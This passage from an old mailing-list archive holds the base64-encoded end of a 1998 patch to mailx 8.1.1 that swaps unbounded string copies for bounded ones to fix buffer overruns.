CQlzdHIgPSBsYXN0c2NhbjsNCi0JZWxzZQ0KLQkJc3RyY3B5KGxhc3RzY2Fu LCBzdHIpOw0KKwl9IGVsc2Ugew0KKwkJc3RybmNweShsYXN0c2Nhbiwgc3Ry LCAxMjgpOw0KKwkJbGFzdHNjYW5bMTI3XT0nXDAnOw0KKwl9DQogCW1wID0g Jm1lc3NhZ2VbbWVzZy0xXTsNCiAJDQogCS8qDQpkaWZmIC1ydSBtYWlseC04 LjEuMS5vcmlnL21haW4uYyBtYWlseC04LjEuMS9tYWluLmMNCi0tLSBtYWls eC04LjEuMS5vcmlnL21haW4uYwlGcmkgSnVuIDE0IDEwOjI3OjA1IDE5OTYN CisrKyBtYWlseC04LjEuMS9tYWluLmMJU2F0IEp1biAyMCAwNDo1OToxOCAx OTk4DQpAQCAtNDgsNiArNDgsMTIgQEANCiAjZW5kaWYNCiAjZW5kaWYgLyog bm90IGxpbnQgKi8NCiANCisvKg0KKyAqIE1vc3Qgc3RyY3B5L3NwcmludGYg ZnVuY3Rpb25zIGhhdmUgYmVlbiBjaGFuZ2VkIHRvIHN0cm5jcHkvc25wcmlu dGYgdG8NCisgKiBjb3JyZWN0IHNldmVyYWwgYnVmZmVyIG92ZXJydW5zIChh dCBsZWFzdCBvbmUgb3QgdGhlbSB3YXMgZXhwbG9pdGFibGUpLg0KKyAqIFNh dCBKdW4gMjAgMDQ6NTg6MDkgQ0VTVCAxOTk4IEFsdmFybyBNYXJ0aW5leiBF Y2hldmFycmlhIDxhbHZhcm9AbGFuZGVyLmVzPg0KKyAqLw0KKw0KICNpbmNs dWRlICJyY3YuaCINCiAjaW5jbHVkZSA8ZmNudGwuaD4NCiAjaW5jbHVkZSA8 c3lzL2lvY3RsLmg+DQpkaWZmIC1ydSBtYWlseC04LjEuMS5vcmlnL3Y3Lmxv Y2FsLmMgbWFpbHgtOC4xLjEvdjcubG9jYWwuYw0KLS0tIG1haWx4LTguMS4x Lm9yaWcvdjcubG9jYWwuYwlGcmkgSnVuIDE0IDEwOjI3OjA5IDE5OTYNCisr KyBtYWlseC04LjEuMS92Ny5sb2NhbC5jCVNhdCBKdW4gMjAgMDQ6MzQ6NTcg MTk5OA0KQEAgLTYwLDE1ICs2MCwxOSBAQA0KICAqIG1haWwgaXMgcXVldWVk KS4NCiAgKi8NCiB2b2lkDQotZmluZG1haWwodXNlciwgYnVmKQ0KK2ZpbmRt YWlsKHVzZXIsIGJ1Ziwgc2l6ZSkNCiAJY2hhciAqdXNlciwgKmJ1ZjsNCisJ aW50IHNpemU7DQogew0KIAljaGFyICptYm94Ow0KIA0KLQlpZiAoIShtYm94 ID0gZ2V0ZW52KCJNQUlMIikpKQ0KLQkJKHZvaWQpc3ByaW50ZihidWYsICIl cy8lcyIsIF9QQVRIX01BSUxESVIsIHVzZXIpOw0KLQllbHNlDQotCQkodm9p ZClzdHJjcHkoYnVmLCBtYm94KTsNCisJaWYgKCEobWJveCA9IGdldGVudigi TUFJTCIpKSkgew0KKwkJKHZvaWQpc25wcmludGYoYnVmLCBzaXplLCAiJXMv JXMiLCBfUEFUSF9NQUlMRElSLCB1c2VyKTsNCisJfSBlbHNlIHsNCisJCSh2 b2lkKXN0cm5jcHkoYnVmLCBtYm94LCBzaXplKTsNCisJCWJ1ZltzaXplLTFd PSdcMCc7DQorCX0NCisNCiB9DQogDQogLyoNCg== --1287857710-1215613336-898748369=:12634--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:59:25 PDT